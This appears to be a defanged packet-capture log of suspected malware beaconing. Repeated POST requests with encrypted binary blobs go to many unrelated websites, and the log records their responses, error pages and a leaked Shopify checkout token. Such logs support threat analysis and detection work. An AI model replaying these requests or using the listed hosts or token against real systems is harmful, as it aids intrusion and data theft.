X-Permitted-Cross-Domain-Policies: none
X-XSS-Protection: 1; mode=block; report=/xss-report?source[action]=not_found&source[app]=Shopify&source[controller]=storefront_section/shop&source[section]=storefront&source[uuid]=0ce6d808-a8e9-49bf-9c0b-1d2a3c5a0671
X-Dc: ash,chi2
X-Request-ID: 0ce6d808-a8e9-49bf-9c0b-1d2a3c5a0671
1c80..<!doctype html>.<!--[if lt IE 7]> <html class="no
-touch no-js lt-ie9 lt-ie8 lt-ie7" lang="en"> <![endif]-->.&l
t;!--[if IE 7]> <html class="no-touch no-js lt-ie9 lt-ie8" lang=
"en"> <![endif]-->.<!--[if IE 8]> <html class="no-to
uch no-js lt-ie9" lang="en"> <![endif]-->.<!--[if IE 9]>
; <html class="ie9 no-touch no-js"> <![endif]-->.<!--[i
f (gt IE 9)|!(IE)]><!--> <html class="no-touch no-js">
<!--<![endif]-->..<head>. <meta charset="UTF-8">
. <meta http-equiv='X-UA-Compatible' content='IE=edge,chrome=1'>
;. <link rel="shortcut icon" type="image/png" href="//cdn.shopify.
com/s/files/1/0660/4951/t/6/assets/favicon.png?15253028996285316848"&g
t;.. <title>. 404 Page Not Found. </title>.. .. <
;link rel="canonical" href="">. <meta name="viewport" content="
width=device-width,initial-scale=1">.. .. <meta property="og:t
ype" content="website">. <meta property="og:title" content="404
Not Found">. ... <meta property="og:url" content="">. <
;meta property="og:site_name" content="Church Clothes">.. ......
<link href="//cdn.shopify.com/s/files/1/0660/4951/t/6/assets/style.
scss.css?15253028996285316848" rel="stylesheet" type="text/css" media=
"all" />.. <meta name="shopify-checkout-api-token" content="375
efe25c58e2f06132afe7ba69a6262">.<script type="text/javascript"&g
t;.//<![CDATA[. var Shopify = Shopify || {};. Shopify

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 484
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: brookfarm.com.au
Connection: Keep-Alive
Cache-Control: no-cache

GL21m2EFt17z7bnLwN9XfjqQSXhfijHwJUJWatPlnRGleIVtMJUPPJZZa8LdUpx3Fwng9R8m/7pIFKIdcsEbYd2fYFHVxDpptUuDOMt967ITFLsIwAVGJA1aQlOZMI4pAMRFB1dtT65JLT5zqVf5b6VCcLKbb3KQStCmYeyka3E9/ygB7v8H9S6rVu2k MTdYry98chi2kMy8ilt3RSrYvMMoClVOj1W0tOTn q3vsouTOFDV9XZotZoZGjWofdriggZU0wn8aSoN OjdouAeOc/Vrx ePalvS8yPWSsnk5FqaJ44zPWH AyI3rkvrJ8R0QEQmaY3xNeeURCycfPzYNXG6HaohI3MwHyw8MZ/qAdEM1W lrNx9GaSXkSHaT5ICCIBUwE41m3ucBwygjudo7btGvVTcYmstbPEURZv9cknt8/WyCRyRzydc1VwaQ5KJXhQQiMCHsoLGAX2gAHctn2f5kDDKn06Q==
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:16:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=dc3fbf87e6665c61cfb25b8d9bb3172a41498907798; expires=Sun, 01-Jul-18 11:16:38 GMT; path=/; domain=.brookfarm.com.au; HttpOnly
Vary: Accept-Encoding
P3P: CP="NOI"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Link: <hXXps://brookfarm.com.au/wp-json/>; rel="hXXps://api.w.org/", <hXXps://brookfarm.com.au/>; rel=shortlink
Set-Cookie: PHPSESSID=ec2492ac5567f25e9b2c7eddfcfad7f4; path=/
Server: cloudflare-nginx
CF-RAY: 3778f44f940b826d-KBP
7c02..<!DOCTYPE html>.<!--[if IE 6]>.<html id="ie6" lan
g="en-US" prefix="og: hXXp://ogp.me/ns#">.<![endif]-->.<!-
-[if IE 7]>.<html id="ie7" lang="en-US" prefix="og: hXXp://ogp.m
e/ns#">.<![endif]-->.<!--[if IE 8]>.<html id="ie8" l
ang="en-US" prefix="og: hXXp://ogp.me/ns#">.<![endif]-->.<
!--[if !(IE 6) | !(IE 7) | !(IE 8) ]><!-->.<html lang="en
-US" prefix="og: hXXp://ogp.me/ns#">.<!--<![endif]-->.<
head>..<meta charset="UTF-8" />......<meta http-equiv="X-U
A-Compatible" content="IE=edge">.<script src="hXXps://use.typeki
t.net/qji6foq.js"></script>..<script>try{Typekit.load({
async: true });}catch(e){}</script>...<link rel="pingback" h
ref="" />....<!--[if lt IE 9]>..<script src="hXXp://brookf
arm.com.au/important/themes/Divi/js/html5.js" type="text/javascript"&g
t;</script>..<![endif]-->...<script type="text/javascri
pt">...document.documentElement.className = 'js';..</script>.
..<title>HOME PAGE - Brookfarm</title>.<!-- Performance
scores of this site is tuned by WP Performance Score Booster plugin v
1.7.2 - hXXp://wordpress.org/plugins/wp-performance-score-booster --&g
t;.<script>(window.gaDevIds=window.gaDevIds||[]).push('5CDcaG');
</script>.<!-- This site is optimized with the Yoast SEO plug
in v4.9 - hXXps://yoast.com/wordpress/plugins/seo/ -->.<link rel
="canonical" href="hXXps://brookfarm.com.au/" />.<meta prope

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 532
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: unitedearthgroup.com
Connection: Keep-Alive
Cache-Control: no-cache

zH6NwQe2h3cTli4aNvuIJ9DV2Wf9RuVhKxpmHGxY0bypfrZCY67fzdlTyCcDGO3PkTv3pR3nWlvYftBqoIcm9sPANTOf0jZyem9ZH3c9ejqDfTbd3id wFsva0RFBjMZFk2ixiQcmW/W091VT1g/HyDzwEfy1mYo4XBGWwHE/Ak491MnfXVuS7L8WsUKCgCCJ3goE1sxV00SougGEhxNFJG34A299oYUcZ1Z0s0GPk2r5 cr6bWZR95acfnrQTdGCX2wt2uVX0QMU3OTokIj5F mQWEhFP94VZX3g4E5y9zpBTjYitKTgL7ji56KnWID24lXcVOyyfddg7X6QZUGPbJ5QjQZT5cEsGvsxzGA6NMPnDAB1JODAOy/ufYhTdi5eldq/72n7tKHaN3eBgGwvzfJq2i2sh8ZkI McEx8DTnIoFE0XFMsCe13azJ5qUdNs2p/TybGHqfATGV6NyEyii7I8k62M1Qlyxy4sdgtIXtb4pnmYXDBCwr6G8N1qxN1pDhpypbGlAJmwr3ksQ==
HTTP/1.1 200 OK
Cache-Control: private
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
Date: Sat, 01 Jul 2017 11:17:06 GMT
3f4..<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"   "
hXXp://VVV.w3.org/TR/html4/frameset.dtd"><html><head>&l
t;meta http-equiv="Content-type" content="text/html;charset=UTF-8">
<title>The United Earth Group of Companies</title><meta
name="description" content="This is the main website Portal for The U
nited Earth Group of Companies offering business and consumer savings
of a variety of products and services including New Cars, Life Insuran
ce, Mortgage Protection, Critical illness, Conveyancing Services, lega
l services and others." ><meta name="keywords" content="UEG Auto
motives, Value For Money Check, UEG Finance, UEG Properties, UEG Langu
ages, UEG Promotions, Tony Wrightley, Disco Services." ><meta na
me="revisit-after" content="5 days" ></head><frameset rows
="100%,*" ><noframes><body ><p>This page uses fra
mes but your browser does not support them.</p></body><
/noframes><frame name="main" src="hXXp://VVV.uegfinance.wix.com/
united-earth-group" scrolling="auto" frameborder="0" ></frameset
></html>..0..HTTP/1.1 200 OK..Cache-Control: private..Transfe
r-Encoding: chunked..Content-Type: text/html; charset=utf-8..Server: M
icrosoft-IIS/8.5..X-AspNet-Version: 4.0.30319..Date: Sat, 01 Jul 2017
11:17:06 GMT..3f4..<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Fra
meset//EN" "hXXp://VVV.w3.org/TR/html4/frameset.dtd"><html>
<head><meta http-equiv="Content-type" content="text/html;

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 512
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: fastarchofamerica.com
Connection: Keep-Alive
Cache-Control: no-cache

CfVWQRGBBV6Fp8q3sEfMzmp7DBbP1 Qu1WCWfbHQDflxNkUxrr7tbhhREJPWWm2GSp0duYGscHAgwPKL/ynMFJ Kx50xI/z9tb55LsMbFIgx0nYjhdLj6QD5ITyOjJ1yocnL2sVmzG4A8/83  5dhUeF6w1hxX3xcKlsc0Obpdp33fffN22XsYgLATNIk 4R0x9RSi6zkCV8oy YtDyCH/dcjiCDZTLrsO4HfWiU9rPCTJzBpzNVk3xrC 2LUrUxwZmjKYFvqjYMf 0InqZ5JMFMs4bO4TNKzlRmbZgvhXiY/cZ/sUtxnuwNzSM3ga0wsPErNy8zRodiUH4mdeX1 QwGQgdrddVQTDqVwRyGv15jxD1IogGRxf OB9cG04nhs9ekauVnDLhnfj/A7IG1ftVibGVqcHS4OssmkQ1 GOUEBYeooubkCUwF7NBdknZ5TuCcuW99j56 3Gx4TTKmhUrxMFjvnJKkhxrswpzxAivth7IS8eGBvMd4iVgDeA==
HTTP/1.1 418 unused
Date: Sat, 01 Jul 2017 11:16:38 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 521
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>418 unused</title>.</head><bod
y>.<h1>unused</h1>.<p>The server encountered an i
nternal error or.misconfiguration and was unable to complete.your requ
est.</p>.<p>Please contact the server administrator,. webm
aster@fastarchofamerica.com and inform them of the time the error occu
rred,.and anything you might have done that may have.caused the error.
</p>.<p>More information about this error may be available
.in the server error log.</p>.</body></html>...


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 472
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: lognetic.com
Connection: Keep-Alive
Cache-Control: no-cache

0Qq 6r/5LV GZ4vqnrztxkiuMm0VocfLY4Wm0sPBUITIrxE71B817gTgbPE080CgWEbD4EQ5Gix8KIuCK3p6hCGCqUGswaYto7MC1NhR8PI4dwPKQGTV4/YZFbGAKOMS8fqbEpS6TS0mUFxJtciQ5D10n4mb2HFouRQwBfoarOWFXVD9jqhvSwVeLvTIgVmSd64UDau93/PTFwf1YQd/OT54qXBMHpHpvq/7 cB38c282buMxUkAT6 zAnQF8m5QCe8 Ckug7QxFrJrySmfEqMlX2Oa4FgJzUdubBxHs0vpB1QRwDbiJAnME5VVf2TnkBhrpxZMIvFKqGzUcf5rGnDh2XixKjCshM1M0CvcOeq4/NEcgVrA03iZ1v7mzYtAKImEGj/KwYF1UXeIm4lIIXmdm33ZGWoUFPE2OHFVkzCr6tq8BM8UqpHaCuOBs6xWs6/koDBA5Nqaia8q9kxpzUFk=
HTTP/1.1 405 Method Not Allowed
Allow: GET, HEAD, OPTIONS, TRACE
Content-Type: text/html
Server: Microsoft-IIS/10.0
Date: Sat, 01 Jul 2017 11:16:39 GMT
Content-Length: 1293
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://ww
w.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://
VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content
-Type" content="text/html; charset=iso-8859-1"/>..<title>405
- HTTP verb used to access this page is not allowed.</title>..&l
t;style type="text/css">..<!--..body{margin:0;font-size:.7em;fon
t-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..f
ieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color
:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.
2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0
0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-ser
if;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;p
osition:relative;}...content-container{background:#FFF;width:96%;margi
n-top:8px;padding:10px;position:relative;}..-->..</style>..&l
t;/head>..<body>..<div id="header"><h1>Server Err
or</h1></div>..<div id="content">.. <div class="c
ontent-container"><fieldset>.. <h2>405 - HTTP verb use
d to access this page is not allowed.</h2>.. <h3>The page
you are looking for cannot be displayed because an invalid method (HT
TP verb) was used to attempt access.</h3>.. </fieldset><
;/div>..</div>..</body>..</html>....

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 516
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: korta-sa.com
Connection: Keep-Alive
Cache-Control: no-cache

1BgbEV5TpWDdVzwkqaM5KEH4 SyeQBaPcvlFTILSi7uaJ5TLkIF0R2/fzw M6dzRzgtHXHdvgyIA7FYAVD1etIjPPpCcByi5Lc671lOCN4tTU5uqJVEuxPVjG7 VGzsacQxhxGOPsg6bnkN3fDVwxke3/2LZn2GQEnVA1VblwkxcpBlGrP5ialrWHV935nrHr3BfAm/Ga8TJgQDL7yNQfogD1rXdG7Qh8pyt3bJEYXFFUJK o6TkFRtnxNaFxTBx6ej8uy6B9aNxTTgcaJduTNn05Wp e9B0bECGcvjbwMF 960 6yZXVQd2IqhuXlQZ9IyL  qjSPtPYZJfcZNCVKUcySPGcK7z1L8Arv7rPs0NUn4mYS ZQm1NP/I 6Twy3/yAi5OAP0A1uATezRNRatUtJqHzWpSZbybXq8FNSLpo9CH73eSfKxGVrZXCSMgtCbIn7uJXYKIQZ5bK1jlFfeXAKntH/Jpf5 DtiMFalvKIaVPluMSuuR00uuJmBcwe1tk=
HTTP/1.1 403 Forbidden
Date: Sat, 01 Jul 2017 10:51:30 GMT
Server: Apache/2.2.22 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 280
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>403 Forbidden</title>.</head><
body>.<h1>Forbidden</h1>.<p>You don't have permis
sion to access /.on this server.</p>.<hr>.<address>A
pache/2.2.22 (Ubuntu) Server at korta-sa.com Port 80</address>.&
lt;/body></html>...


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 480
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: tutuji-saitama.com
Connection: Keep-Alive
Cache-Control: no-cache

Joa 2Cf5219zsjE81iSvFPClmZ6d6K/pSwfSlgGL8dwizREsFvjVYfa9Y/6E4U3nTSvliT63/W8DDclWyR1LdiuJgKfvbIt7QhgFJvbAA08sCW1P9apHQ0PxBqNXGs1R9VNzRTZpuh5JSYQZ7Qni19hkxsj9rtHm2BzYkikxzNIuicEgl4ucN4PdQvZZrceck67VqHNcsD6Ct4M8V2rW/0kXeZG1huilIKHyMppuwwYwwMvEqfS8wqOg9sUboWoOEyvdZ UZzd6a7 zn1wI8FXJmbuyghXwa0KQO1Y08YDILYmPu85Mdu0e R0j5s3dYr4n0pgD45dnfdYjRP3U9WZvb5BrBOpE1FSYsSmUlPiDSPkY1kOjURgzNWaNB06j/iDMk3I840uVHPA22XlJ 1XXE83v1v Nq4CBQHfc0mbKVh10Felqo1a3L53GQdiENNN XG Bj9IBrm/n3bul4U5EWAnwBSu4=
HTTP/1.1 403 Forbidden
Date: Sat, 01 Jul 2017 11:16:40 GMT
Server: Apache
Accept-Ranges: bytes
X-Powered-By: PleskLin
Content-Length: 5043
Keep-Alive: timeout=2, max=70
Connection: Keep-Alive
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "hXXp://VVV.w3.or
g/TR/xhtml11/DTD/xhtml11.dtd">..<head>...<title>Apache
HTTP Server Test Page powered by CentOS</title>...<meta http-
equiv="Content-Type" content="text/html; charset=UTF-8" />...<st
yle type="text/css">....body {.....background-color: #fff;.....colo
r: #000;.....font-size: 0.9em;.....font-family: sans-serif,helvetica;.
....margin: 0;.....padding: 0;....}....:link {.....color: #0000FF;....
}....:visited {.....color: #0000FF;....}....a:hover {.....color: #3399
FF;....}....h1 {.....text-align: center;.....margin: 0;.....padding: 0
.6em 2em 0.4em;.....background-color: #3399FF;.....color: #ffffff;....
.font-weight: normal;.....font-size: 1.75em;.....border-bottom: 2px so
lid #000;....}....h1 strong {.....font-weight: bold;....}....h2 {.....
font-size: 1.1em;.....font-weight: bold;....}.....content {.....paddin
g: 1em 5em;....}.....content-columns {...../* Setting relative positio
ning allows for .....absolute positioning for sub-classes */.....posit
ion: relative;.....padding-top: 1em;....}.....content-column-left {...
../* Value for IE/Win; will be overwritten for other browsers */.....w
idth: 47%;.....padding-right: 3%;.....float: left;.....padding-bottom:
2em;....}.....content-column-right {...../* Values for IE/Win; will b
e overwritten for other browsers */.....width: 47%;.....padding-left:
3%;.....float: left;.....padding-bottom: 2em;....}.....content-columns
>.content-column-left, .content-columns>.content-column-righ

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 456
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: westhillsstl.org
Connection: Keep-Alive
Cache-Control: no-cache

bEGtMTCTCoiKJvsPQ4xNu ORsGXY6WQyZKV3hR/1vmrFY1DQafqL8b9w1HEImRW7Kth9eEECK3s5Fr890vDcIGxHT9zPN2YfD2upVC7UboZdkpqutZNWp9aILVH0lE4Yaj/BfIBX4ncV48CTj4jjQu3tzIdp6i2IHRTLt7uqmWxIwOzOL6Ix6tzLYRHHHySbJi1XpZA3FWpKcc6EDMk0uijeSPuhJr4aygsoPraAU4gPYbPWyqTApSB3VbAc/NhcfH2ZIZEBXGIRpOGLfvKKlDSlg7Tl6 PlgCf/vkxtj9vv FNSJml9ITfiy4/LwspBrgrppoF0G bIeTDs cEHOA5ALn7R72OVq7LYFSvy 9hMrD32B  cuFHaoBcLWMnS9ubmigleSZUg7qacaKSHjmxj1hlAZbOTWoaqHe5y79iSVFCFOhO2eq0qM/2B9W25T2E8Ug==
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:17:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=dabca4f966e1d5ca50060e2b741145afe1498907847; expires=Sun, 01-Jul-18 11:17:27 GMT; path=/; domain=.westhillsstl.org; HttpOnly
X-Powered-By: W3 Total Cache/0.9.5.4
Link: <hXXp://westhillsstl.org/wp-json/>; rel="hXXps://api.w.org/", <hXXp://westhillsstl.org/>; rel=shortlink
X-TEC-API-VERSION: v1
X-TEC-API-ROOT: hXXp://westhillsstl.org/wp-json/tribe/events/v1/
X-TEC-API-ORIGIN: hXXp://westhillsstl.org
Vary: Accept-Encoding
Cache-Control: max-age=3600
Expires: Sat, 01 Jul 2017 12:17:26 GMT
Server: cloudflare-nginx
CF-RAY: 3778f57e46f38213-KBP
14ebc..<!DOCTYPE html>.<html class="" lang="en-US" prefix="og
: hXXp://ogp.me/ns# fb: hXXp://ogp.me/ns/fb# og: hXXp://ogp.me/ns#">
;.<head>.<meta http-equiv="X-UA-Compatible" content="IE=edge"
/>.<meta http-equiv="Content-Type" content="text/html; charset=u
tf-8"/>.<meta name="viewport" content="width=device-width, initi
al-scale=1, maximum-scale=1"/>.<title>West Hills Community Ch
urch - Serving Town & Country, West County, Chesterfield</title
>. .<meta name="description" content="Serving Town & Country
, West County, Chesterfield...Deaf Ministry, Bible Classes, Children&#
039;s Church...Gospel-centered Christian Community...Loving Jesus..."/
>.<link rel="canonical" href="hXXp://westhillsstl.org/"/>.<
;meta property="og:locale" content="en_US"/>.<meta property="og:
type" content="website"/>.<meta property="og:title" content="Wes
t Hills Community Church - Serving Town & Country, West County, Ch
esterfield"/>.<meta property="og:description" content="Serving T
own & Country, West County, Chesterfield...Deaf Ministry, Bible Cl
asses, Children's Church...Gospel-centered Christian Community...
Loving Jesus..."/>.<meta property="og:url" content="hXXp://westh
illsstl.org/"/>.<meta property="og:site_name" content="West Hill
s Community Church"/>.<meta name="twitter:card" content="summary
"/>.<meta name="twitter:description" content="Serving Town &
Country, West County, Chesterfield...Deaf Ministry, Bible Classes

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 516
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: gamblingonlinemagazine.com
Connection: Keep-Alive
Cache-Control: no-cache

F4Tvj3KI1XAlxuuspU3GXnU2QJhCveurxt3swZNiE4xSLnlUtOMRWu4i1tcx/JuNWvtiN8oryIfqpGhyomMF5Idr8tJk48ZX71UWJjUHUs2 b2kklfxDgh 0hbnvURFTk58Q7oKuRUgRli7WQFVWTeg71Z3NWbkSHevH6O2S9pDH1ufPKhyLtxbJxmFqL3KhYitcMTyHi55kU UJomEEf5FYzQ9lePlmSGsLHwTrIXNOLzbtg/tq1DeiDseNtdDD5ULr0t1PWT43tROtXZEWkCF5Lpu2 a3NUoJKvZGUDEkxvJWh52j7atPnjjXPmRFHA/xTUdEoUzdpPdkI J8tw7sOyvRFWa8P98IImn/B/rrLnop99vdQni6L/1yY4nPAw yoPUIz10vTgeX27ph95rCdVktNyCRscDx86ZlqAkbk4RdU0uPbPVWdoJln/BzjbDXSyFLYhU8/few6SwfAZ4DMgNmokNzO4sQbb3rBm9hZZiHrgODcySbFYzmuD9SbFuQ=
HTTP/1.1 503 Service Temporarily Unavailable
Date: Sat, 01 Jul 2017 11:17:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: __cfduid=d29bacfe9e5f2edded9b2594bad101e101498907820; expires=Sun, 01-Jul-18 11:17:00 GMT; path=/; domain=.gamblingonlinemagazine.com; HttpOnly
X-Frame-Options: SAMEORIGIN
Cache-Control: no-cache
Server: cloudflare-nginx
CF-RAY: 3778f4d454ec8430-KBP
129c..<!DOCTYPE HTML>.<html lang="en-US">.<head>.  &
lt;meta charset="UTF-8" />. <meta http-equiv="Content-Type" con
tent="text/html; charset=UTF-8" />. <meta http-equiv="X-UA-Comp
atible" content="IE=Edge,chrome=1" />. <meta name="robots" cont
ent="noindex, nofollow" />. <meta name="viewport" content="widt
h=device-width, initial-scale=1, maximum-scale=1" />. <title>
;Just a moment...</title>. <style type="text/css">. ht
ml, body {width: 100%; height: 100%; margin: 0; padding: 0;}. body
{background-color: #ffffff; font-family: Helvetica, Arial, sans-serif;
font-size: 100%;}. h1 {font-size: 1.5em; color: #404040; text-alig
n: center;}. p {font-size: 1em; color: #404040; text-align: center;
margin: 10px 0 0 0;}. #spinner {margin: 0 auto 30px auto; display:
block;}. .attribution {margin-top: 20px;}. @-webkit-keyframes b
ubbles { 33%: { -webkit-transform: translateY(10px); transform: transl
ateY(10px); } 66% { -webkit-transform: translateY(-10px); transform: t
ranslateY(-10px); } 100% { -webkit-transform: translateY(0); transform
: translateY(0); } }. @keyframes bubbles { 33%: { -webkit-transform
: translateY(10px); transform: translateY(10px); } 66% { -webkit-trans
form: translateY(-10px); transform: translateY(-10px); } 100% { -webki
t-transform: translateY(0); transform: translateY(0); } }. .bubbles
{ background-color: #404040; width:15px; height: 15px; margin:2px; bo
rder-radius:100%; -webkit-animation:bubbles 0.6s 0.07s infinite ea

<<< skipped >>>

GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.alternative-aquitaine.co.uk
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 301 Moved Permanently
Date: Sat, 01 Jul 2017 11:16:56 GMT
Location: hXXps://VVV.alternative-aquitaine.co.uk/
Cache-Control: max-age=600
Expires: Sat, 01 Jul 2017 11:26:56 GMT
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
X-Varnish: 8225358 3653042
Age: 9
X-Cache: HIT
X-Cache-Hits: 1
Content-Length: 248
Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>301 Moved Permanently</title>.</head
><body>.<h1>Moved Permanently</h1>.<p>The d
ocument has moved <a href="hXXps://VVV.alternative-aquitaine.co.uk/
">here</a>.</p>.</body></html>.HTTP/1.1 301
Moved Permanently..Date: Sat, 01 Jul 2017 11:16:56 GMT..Location: htt
ps://VVV.alternative-aquitaine.co.uk/..Cache-Control: max-age=600..Exp
ires: Sat, 01 Jul 2017 11:26:56 GMT..Content-Type: text/html; charset=
iso-8859-1..Vary: Accept-Encoding..X-Varnish: 8225358 3653042..Age: 9.
.X-Cache: HIT..X-Cache-Hits: 1..Content-Length: 248..Connection: keep-
alive..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<ht
ml><head>.<title>301 Moved Permanently</title>.&l
t;/head><body>.<h1>Moved Permanently</h1>.<p&g
t;The document has moved <a href="hXXps://VVV.alternative-aquitaine
.co.uk/">here</a>.</p>.</body></html>...


GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEENSAj/6qJAfE5/j9OXBRE4= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.trust-provider.com


HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:16:44 GMT
Server: Apache
Last-Modified: Wed, 28 Jun 2017 15:09:48 GMT
Expires: Wed, 05 Jul 2017 15:09:48 GMT
ETag: 29B32DA64B1F453EBDA30E0BD756AEFCDAA2DE12
Cache-Control: max-age=358983,public,no-transform,must-revalidate
X-OCSP-Reponder-ID: rmdccaocsp32
Content-Length: 471
Connection: close
Content-Type: application/ocsp-response
0..........0..... .....0......0...0.........z4.&...&T....$.T...2017062
8150948Z0s0q0I0... ........|.fT...D.b&...e{.z.......z4.&...&T....$.T..
.CR.?..........DN....20170628150948Z....20170705150948Z0...*.H........
.....Q..8..J........$Q......)0...6.3........R.....a. .Y..{....F..0..'
......6.E..........0....R8.y...l..z...F...]e2..2^....C.g.X.o:7.TvF...#
(^.q...?KI..o8W.C...k...V..-..S..!..7..rv$0Kf.EX.....;..g.t......v....
:0St.......Oe..3n..\./.'.'...0'....c. 6.SB$,....Z^...


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 504
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: audience-web.net
Connection: Keep-Alive
Cache-Control: no-cache

pIegcVeB3V3rack1Ri6246DNDfWNzJV1e7JE5hJaUlkh8yKXZQAoEcljaO7dXxurjDCESqwEz2lPpfgi8Ph D95knonGNf8kcqlFXkV MqVxUTqjHT8onOSl82hWHyNkQd19zDq1gYzzyOLQlkIxXR70ZCrwwsguZosZMidbSMTMAUnMCmINlAZF9Vxn0HQatLhI 1DLIieDA7e2uIrPrkI2e8h49Pq/BkKZW2bQeODbiertaVSQXg62iYxG1UZHhEcokkLm76CSSJVKS6kLCUtCzfhd5lATFaLyIRHC a0WD/KMG7bXwBpatvaTt5inOTO3HEIKmtU/dA7Y0hiRlSuAF9Y6eQfCVkbcjk 4ivRPhWzwJQNmtLAskhGreXeZoen6mIkHKg1bcmr1ENOXU4w9HrTvYaT/i6/VUyNbw6GRapLPZvLQp2h4eqbPVlTNrw1N1BbWbxxLV5xm2Y/PWMy6T/IDjYA1MQsWRZxbY6/TPhx38NW YWk=
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 01 Jul 2017 11:16:38 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=78dafeac7710b4016a0b041e71d81aa9|194.242.96.218|1498907798|1498907798|0|1|0; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Set-Cookie: snkz=194.242.96.218; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
0..


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 516
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: audio-direkt.net
Connection: Keep-Alive
Cache-Control: no-cache

mTGAYv1HRXRnhWsttGlXxjaZQ2kr1xStgcDB9VJRT6YVokNGj72xs22x2qUu5EIDNYKnXdsoMUeAUFdVHbaJtzoeD3M q6Qkho4bqwILMQ3ToRNbf9xv8ujB g8jgcXZ6eZhqxtBzste2BSOGUhfIzUPE2UvwNXImZoJVd67aSPW3XxoRvqTbzF/30esnwZ31i1Je63WWXwnbCGg6Dj8nWNuYbJKwPRlq2c2Se7pd4im53EUj9Cpaa6i6IJWKKxHjwE3k4SjeWsS3hCe1fnzn4I3nrBVCH5ISTA DHc5B8HedhEPQEenlKj9wcgFMf1x9pik3yEEe8Bi0JR2Uj8V W9cUNdDGRoSs8oWI zz1Wv415MC9op7259Yu23YfeyetF87Wjb/2EaRi1Y3vLBTIR1OJhqvTUjerZYbXQkrrete3GleE59SV94nOGKH7bLjyiRXl/EMWi bwxrsGWl/NNYPWq/ZE57eulIGG3l5KQFccSQxMl74TkloY cje8OMHQ==
HTTP/1.1 200 OK
